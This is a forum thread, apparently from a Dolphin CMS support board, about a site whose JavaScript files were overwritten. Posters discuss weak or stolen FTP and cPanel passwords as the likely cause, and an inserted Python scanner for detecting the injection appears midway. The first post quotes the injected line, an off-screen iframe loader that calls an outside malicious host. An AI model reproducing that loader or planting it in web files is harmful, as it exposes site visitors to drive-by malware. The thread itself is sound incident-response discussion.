I was asked to take a look at a Dolphin website this morning; complaint was that certain links in the admin would not work. Upon inspection of the error console I saw many jquery errors being reported; one mentioned a closing tag for a function was missing so I went to take a look at the jquery directory. I immediately noticed that all the file sizes for the jquery files were wrong; some were way smaller than the correct file sizes. I downloaded one and opened it in an editor to examine and found the following:
document.write('<iframe src="http://satranuic.karaokebus.com/rigitusim16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>');
Has anyone else seen this exploit?
All the jquery file names were correct; so the exploit either rewrote the contents of the files or someone has set up a Dolphin exploit. I am leaning towards the virus/malware: an attack scanning for .js files and rewriting the contents.
I quickly got out of the site and contacted the owner with the bad news. I am going to do a deep scan of my local system to make sure nothing got transferred locally; these new exploits can transfer in the background without you doing anything but visiting a page. If anyone has seen this before, let me know if there is anything specific I need to check on my local machine.
Geeks, making the world a better place
A Google of "satranuic" shows other sites that have been hit... one appears to be a Dolphin site, ********singles.com...
What I would like to know is how the infection occurred. I can easily fix the problem but if there is malware on the server that would overwrite the js files after I put the correct ones back in place, then it will just be replicated again. I have contacted the owner and informed them of the issue. They will need to contact their hosting company and ask for a scan of the server and see what turns up.
Geeks, making the world a better place
More likely the user or an FTP account was compromised and used to make the changes. Very rarely is the culprit something like malware on the server or an actual exploit in Dolphin. Still, a server scan isn't a bad idea, but those accounts need to have their passwords changed as soon as possible. The user should also scan their local computer for malware, which is sometimes how this happens.
BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
The first thing I did was to tell the owner to change all passwords on the server and to make them correct passwords.
If this was a manual exploit, then it was set up specifically for a Dolphin site. Every, and I mean every, file in the jquery plugin directory had been changed; the file names were the same but the contents had been altered. I did not look at the js functions directory but I have a feeling they had been changed as well.
Geeks, making the world a better place
I have been informed there was no malware found on the site; of course that does not mean the hosting company is not infected, they just scanned the client's files.
If not malware, then someone hacked into the site and replaced all the js files with infected ones. Quite possible, anyone can download the Dolphin zip files; make the necessary attack, then just ftp up the jquery directory with their infected files overwriting the ones on the server. If that is the case, I caution everyone to tighten the passwords on their ftp servers and control panels. I see way too often lax password practices when helping people.
Geeks, making the world a better place
Update: every single js file, no matter where it was located, was infected. Every single one.
Geeks, making the world a better place
Most likely the cPanel or FTP account was compromised (weak password or a leaked password), and then all JS files were searched for and edited. I've seen this happen with JS files as well as index.php files before. The cause is almost always a weak cPanel account password or a temporary FTP account (with a weak password).
BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
Looking at the log files for activity that matches the mod date of the infected files might shed some light...
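A defender-side check for the situation this thread describes, written as an added example (it is not any poster's code and not part of Dolphin): it walks a web root, flags every .js file that carries an off-screen document.write('<iframe ...') loader like the one quoted in the first post or whose SHA-256 differs from the same path in a clean reference tree (an unpacked Dolphin zip), and records each hit's modification time in UTC so it can be lined up with the FTP/cPanel logs. The regex marker, the directory layout and the placeholder URL are assumptions made for this example.

```python
import hashlib
import os
import re
import tempfile
import time
# Marker for the injection quoted in this thread: document.write() of an iframe
# pushed off-screen. Assumed for this example, not a signature from BoonEx.
INJECTED_IFRAME = re.compile(
    r"""document\.write\(\s*['"]<iframe[^>]*position:\s*absolute""", re.IGNORECASE)

def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def scan_js_tree(webroot, reference=None):
    """Flag .js files carrying the marker or differing from the clean reference tree."""
    findings = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in sorted(filenames):
            if not name.lower().endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot)
            reasons = []
            with open(path, "rb") as f:
                if INJECTED_IFRAME.search(f.read().decode("utf-8", "replace")):
                    reasons.append("injected-iframe")
            if reference is not None:
                ref_path = os.path.join(reference, rel)
                if not os.path.exists(ref_path):
                    reasons.append("not-in-reference")
                elif sha256_of(ref_path) != sha256_of(path):
                    reasons.append("hash-mismatch")
            if reasons:  # mtime in UTC, to line up with FTP/cPanel access logs
                stamp = time.strftime("%Y-%m-%d %H:%M:%S UTC",
                                      time.gmtime(os.path.getmtime(path)))
                findings.append({"file": rel, "reasons": reasons, "mtime": stamp})
    return findings

def demo():
    # Constructed sample: clean jquery.js in the reference tree, the same path
    # in the "site" overwritten by an off-screen iframe loader (placeholder URL).
    clean = "(function($){$.fn.noop=function(){return this;};})(jQuery);\n"
    bad = ("document.write('<iframe src=\"http://PLACEHOLDER.invalid/x.html\" "
           "style=\"top:-999px;left:-999px;position:absolute;\"></iframe>');\n")
    ref, site = tempfile.mkdtemp(), tempfile.mkdtemp()
    for root, body in ((ref, clean), (site, bad)):
        os.makedirs(os.path.join(root, "plugins", "jquery"))
        with open(os.path.join(root, "plugins", "jquery", "jquery.js"), "w") as f:
            f.write(body)
    return scan_js_tree(site, ref)
```

Run it against the live web root and the reference tree from a freshly downloaded Dolphin archive; the mtime column is what to search for in the FTP and cPanel access logs.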
Also, it may be that someone who had access (or maybe still has it) to the site via FTP and/or cPanel saved the password in the browser or FTP client, then the local computer was infected and all saved passwords were stolen by the virus; later the stolen accounts were used to upload the same virus to the website.
I would suggest changing passwords immediately; in the future, try not to save passwords in FTP clients or browsers, which store passwords in clear text or with weak encryption. Ask everyone who could have access to the site to check their computers for viruses with the latest antivirus database.